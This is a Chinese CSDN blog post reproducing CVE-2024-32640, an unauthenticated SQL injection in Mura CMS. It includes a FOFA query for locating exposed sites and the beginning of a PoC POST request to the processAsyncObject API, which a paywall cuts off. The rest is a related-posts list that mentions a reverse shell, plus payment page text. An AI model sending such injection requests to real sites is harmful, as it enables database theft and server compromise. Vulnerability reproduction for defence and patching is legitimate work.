Mura CMS processAsyncObject SQL注入漏洞复现(CVE-2024-32640)

已于 2024-05-10 13:27:37 修改
阅读量839 收藏 1
点赞数 4
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-05-10 13:27:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/138661940
版权
本文介绍了Mura CMS的内容管理系统,重点讨论了2024年5月8日披露的CVE-2024-32640 SQL注入漏洞,该漏洞可能导致敏感信息泄露甚至远程代码执行。复现环境中通过FOFA查询到相关系统,并提供了PoC和Nuclei检测脚本,修复建议包括限制接口访问和升级到最新补丁版本。
摘要由CSDN通过智能技术生成

0x01 产品简介

Mura CMS(Content Management System)是一款用于创建和管理网站内容的开源内容管理系统。它具有许多功能和灵活性,使其成为许多网站开发者和内容创作者的首选工具。是一个强大的企业网站解决方案,可用于创建和管理公司网站、产品目录、新闻发布、客户支持和联系信息等内容。

0x02 漏洞概述

2024年5月8日,互联网上披露其存在CVE-2024-32640 MuraCMS processAsyncObject SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞 构造恶意请求获取数据库中的敏感信息,深入利用可写入后门文件可造成远程代码执行获取服务器权限。

0x03 复现环境

FOFA:"Mura CMS"

0x04 漏洞复现

PoC

POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthisti
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
专栏目录
订阅专栏
漏洞复现MuraCMS-SQL注入-default(CVE-2024-32640)
知黑而守白
07-15 391
Mura CMS 是一款用于构建企业级网站和应用程序的开源内容管理系统。它提供了丰富的功能和灵活的架构,使开发者能够轻松地创建各种类型的网站,包括企业门户、电子商务平台、博客和社交网络等。Mura CMS 具有易用性、可扩展性和高性能等特点,同时支持多语言和多平台部署,因此备受开发者和企业的青睐。Mura CMS processAsyncObject接口处存在SQL注入漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
Goby 漏洞发布| 瑞友天翼应用虚拟化系统 /hmrao.php SQL注入漏洞
m0_46699477的博客
05-13 398
瑞友天翼应用虚拟化系统是基于服务器计算(Server-based Computing)架构的应用虚拟化平台。它将用户 各种应用软件(ERP/OA/CRM…)集中部署在瑞友天翼服务器(群)上,客户端通过 WEB 即可快速安全的访问经服务器上授权 的应用软件,实现集中应用、远程接入、协同办公等,从而为用户打造集中、便捷、安全、高效的虚拟化支撑平台。
hvv在即,我们整理了 2024 年部分勒索漏洞清单
FreeBuf_的博客
05-08 1478
可通过官方补丁更新解决该威胁,免费更新链接:https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?威胁者可向用户发送恶意文件并诱导用户打开文件来利用该漏洞,成功利用可能导致绕过 SmartScreen安全功能。
复现】用友u8CRM 文件读取漏洞
fushuang333的博客
12-28 784
复现】用友u8CRM 文件读取漏洞。用友U8CRM 是一款专为代理销售服务行业设计的集CRM、呼叫中心、OA核心应用于一体,提供前端营销、后端业务处理及员工管理一体化应用的管理软件。
漏洞复现】OpenMetadata 命令执行漏洞复现(CVE-2024-28255)
KKleeeaa的博客
04-11 506
声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。然后就是反弹shell,nc连。0x01FOFA测绘。
Goby 漏洞发布|Masa/Mura CMS /index.cfm/_api/json/v1/default/ SQL 注入漏洞CVE-2024-32640
m0_46699477的博客
05-15 402
Mura CMS是一个强大的企业网站解决方案,可用于创建和管理公司网站、产品目录、新闻发布、客户支持和联系信息等内容。学校、大学和培训机构也可以使用Mura CMS来创建在线学习平台、课程目录和学生信息系统。Mura CMS /index.cfm/_api/json/v1/default/ 接口存在SQL注入漏洞,攻击者利用该漏洞可以执行sql语句,获取数据库数据。
五月份0day/1day/nday漏洞汇总
qq_39894062的博客
06-01 1009
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
MuraCategoryMenu:Mura CMS显示对象提供使用类别的文件夹的菜单导航
05-12
Mura使用类别(存档)在文件夹中导航的唯一选择不满意吗? 此显示对象提供了2个其他用户界面: 等级表 下拉式菜单 菜单将使用所选父类别中的类别自动填充。 要安装,只需复制主题主题的modules文件夹中的...
DenseNet-MURA-PyTorch:使用PyTorch在Standford的MURA数据集上实现DenseNet模型
05-13
MURA数据集上实现169层模型的PyTorch实现,灵感来自Pranav Rajpurkar等人的论文 。 MURA是肌肉骨骼X射线照片的大型数据集,其中放射医师手动将每项研究标记为正常或异常。 重要事项: 所实现的模型是169层Dense...
NS Mura开始「NS Mura Start」-crx插件
03-11
用start.nsmura.si覆盖主页和newtab页面 这个插件为你设置start.nsmura.si的开始页面和新标签 支持语言:slovenščina
Musculoskeletal-Radiographs-Abnormality-Classifier:MURA数据集在骨骼肌肉X光片中对放射医师级异常检测的实现
05-01
肌肉骨骼X光片异常分类器 实验 网络 准确性(遇到) 精度(遇到) 召回(遇到) F1(遇到) 河童(相遇) ... .83(.84) .82(.82) ...Author = {Pranav Rajpurkar and Jeremy Irvin and Aarti Bagul and Daisy ...
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 889
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
SSHamble:一款针对SSH技术安全的研究与分析工具
FreeBuf_的博客
09-11 1039
SSHamble是一款功能强大的SSH技术安全分析与研究工具,该工具基于Go语言开发,可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。
伙房食堂电气安全新挑战:油烟潮湿环境下,如何筑起电气火灾“防火墙”?
acrel002的博客
09-12 398
安科瑞的智能安全配电装置打破了传统用电防护领域中仅仅只能做到“事后处理”的技术瓶颈,提前将配电转换安全电,从源头抑制电弧火花的产生,大大降低火灾风险,同时系统实时监测电气线路中电压、电流、功率、温度、剩余(漏)电流、对地绝缘阻值等关键数据,智能识别电路异常风险,及时将报警信息传送至云管理系统,提醒用户单位及时进行故障排查。近几年,随着我国经济的飞速发展,食堂餐饮也经历了一场变革,越来越多的电器走进了伙房食堂中,实现了电气化,为人们提供了高效便利的饮食服务,但同时也增加了火灾负荷。
消防指挥中心控制台:守护安全的关键枢纽
JiaDeLi_console的博客
09-11 386
它不仅是信息的接收者,更是行动的发起者,协调各方资源,确保消防救援工作高效、有序地进行。消防指挥中心控制台是消防救援工作的关键环节,它以先进的设计、强大的功能和不断升级的科技,为守护人民生命财产安全发挥着不可替代的作用。在未来,随着科技的进一步发展,相信消防指挥中心控制台将变得更加智能、高效,为构建更加安全的社会环境贡献更大的力量。同时,控制台还配备了舒适的座椅,为指挥人员提供良好的工作条件。在消防应急救援的战场上,嘉德立消防指挥中心控制台犹如一座坚实的堡垒,发挥着至关重要的作用。二、先进的设计与功能。
3.比 HTTP 更安全的 HTTPS(工作原理理解、非对称加密理解、证书理解)
weixin_52173250的博客
09-07 1639
HTTPS(Hypertext Transfer Protocol Secure)是一种安全的超文本传输协议,主要用于在客户端和服务器之间安全地传输数据
企业如何构建有效的数据泄露防护安全体系
最新发布
A526847的博客
09-14 432
在当今数字化时代,企业数据已成为核心资产,其安全性直接关系到企业的竞争力、客户信任度以及法律合规性。数据泄露事件频发,不仅会导致经济损失,还可能损害企业声誉和客户关系。因此,构建有效的数据泄露防护安全体系已成为企业不可或缺的重要任务。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值